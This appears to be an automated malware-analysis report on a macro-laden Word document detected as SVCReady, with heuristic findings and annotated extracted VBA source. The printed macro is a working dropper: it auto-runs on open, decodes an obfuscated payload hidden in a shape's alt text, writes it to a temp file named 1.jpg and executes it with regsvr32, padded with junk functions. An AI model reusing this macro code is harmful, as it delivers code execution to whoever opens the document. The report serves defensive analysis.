Verdict: MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OOXML document containing a VBA macro with an AutoOpen subroutine. The macro uses WScript.Shell to execute a command that writes a file named '1.jpg' to the temporary directory. It builds this path with the Environ("tmp") function, indicating downloader or dropper functionality.
Heuristics (7)
- ClamAV (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
- External relationship (high, OOXML_EXTERNAL_REL): External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (low, OLE_VBA_ENVIRON): Environ() call (environment variable access)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4589 bytes | e34d6396a4e2c52ee5c8430baf2df2c39c5e77abd1dd40fd2ab06a5d3766b140 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "e3cf765a"
' The functions below that read ActiveWindow/ActiveDocument properties or return
' constants are never called from AutoOpen; they pad the module to hinder analysis.
Function e762f5ff()
e762f5ff = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function a472736e()
a472736e = ActiveWindow.Index
End Function
Function b0a1860b()
b0a1860b = Application.ActiveDocument.AutoFormatOverride
End Function
Function a44eb9dc()
a44eb9dc = ActiveWindow.Creator
End Function
Sub AutoOpen()
' Runs automatically when the document is opened (OLE_VBA_AUTOOPEN)
Dim aa0c2b54 As New b810b071
' Payload is read from the first shape's alternative text and de-interleaved (every third character kept)
aaa = ce61079c(d2bdffc8)
' Further transformed by the class method eb53dc44 (its body is truncated in this preview)
b5c62664 = aa0c2b54.eb53dc44(aaa, "")
' Write the result to %tmp%\1.jpg
c4172424 d5871320, b5c62664
' Launch "<decoded command> <drop path>" via WScript.Shell
Dim c974cd15 As New WshShell
Call c974cd15.exec(b7581dc7 & " " & d5871320)
End Sub
Attribute VB_Name = "ab30b94e"
Function b46f43ab()
b46f43ab = ActiveWindow.Document
End Function
Function fc40b8d8()
fc40b8d8 = 38067.608593889
End Function
Function e9d24fd3() As Long
Dim e4dcd90e As Long
Dim c9fd3abe As Integer
c9fd3abe = 200
For e4dcd90e = 5 To 90
c9fd3abe = c9fd3abe + e4dcd90e
Next e4dcd90e
e9d24fd3 = c9fd3abe
End Function
Function af855354()
af855354 = ActiveWindow.Visible
End Function
Sub c4172424(f3ffd76b, d66f7af9)
' Writes the string d66f7af9 (converted to Unicode by f24bc2fe) to the file path f3ffd76b
Dim fc935e6d
fc935e6d = FreeFile
Open f3ffd76b For Output As #fc935e6d
Print #fc935e6d, f24bc2fe(d66f7af9)
Close #fc935e6d
End Sub
Function d5871320()
' Drop path built from the TMP environment variable (OLE_VBA_ENVIRON); the .jpg extension does not reflect how the file is used
d5871320 = Environ("tmp") & "\1.jpg"
End Function
Function c76290f0()
c76290f0 = Application.ActiveDocument.ActiveWindow
End Function
Function d0b30402()
d0b30402 = ActiveWindow.Top
End Function
Function f8bab22d()
f8bab22d = ActiveWindow.Type
End Function
Function ca9ef670()
ca9ef670 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function ce61079c(b641a5ed)
' De-interleaving decoder: keeps every third character of the input, starting at position 1
For cf2f796b = 1 To Len(b641a5ed) Step 3
d304679e = d304679e & Mid(b641a5ed, cf2f796b, 1)
Next
ce61079c = d304679e
End Function
Function b4f024a4()
b4f024a4 = ActiveWindow.View
End Function
Function f8b4ba2f()
f8b4ba2f = ActiveWindow.Type
End Function
Function d6a66692()
d6a66692 = 789 + 9
End Function
Function ba6970b0()
ba6970b0 = ActiveWindow.DisplayRulers
End Function
Sub c64e87f2()
End Sub
Function b9523905()
b9523905 = Application.ActiveDocument.AttachedTemplate
End Function
Function b0c4a757()
b0c4a757 = "a7GoRvt"
End Function
Function dd28431d()
dd28431d = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function ccd3e109()
ccd3e109 = 23329.673349652
End Function
Function f24bc2fe(d66f7af9)
' StrConv with 64 (vbUnicode) converts the string to UTF-16 before it is written to disk
f24bc2fe = StrConv(d66f7af9, 64)
End Function
Function db21c8ff()
db21c8ff = 43942.286781848
End Function
Function afc04f43()
afc04f43 = ActiveWindow.WindowNumber
End Function
Function c2d74106()
c2d74106 = ActiveWindow.DisplayVerticalRuler
End Function
Function c0d002bd()
c0d002bd = ActiveWindow.Index
End Function
Function d2bdffc8()
' Payload carrier: the alternative text of the document's first shape
d2bdffc8 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function f6f3992b()
f6f3992b = ActiveWindow.Creator
End Function
Function dac798f5()
dac798f5 = "agwdlKM"
End Function
Function d4a71a51()
d4a71a51 = ActiveWindow.SplitVertical
End Function
Function b75036b8()
b75036b8 = Application.ActiveDocument.Application
End Function
Function b7581dc7()
' Every third character of this string spells "regsvr32"; with the drop path the
' executed command is: regsvr32 %tmp%\1.jpg
b7581dc7 = ce61079c("r05e40gd5sf2v69raa35e2dd")
End Function
Attribute VB_Name = "b810b071"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function edc81dd2()
edc81dd2 = ActiveWindow.Document
End Function
Function fa4a63de()
fa4a63de = ActiveWindow.Thumbnails
End Function
Function e954666d()
e954666d = "Born scoot mealies ah howlings"
End Function
Function a39278f6()
a39278f6 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function eb53dc44(dbcc0205, d87e9329)
Dim b3427090 As Object
Set b
... (truncated)

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 28672 bytes | 6af6fbf1f5e134a7a6fbc1229e3b9214548dd912a7123df6305e3c8dfcab9868 |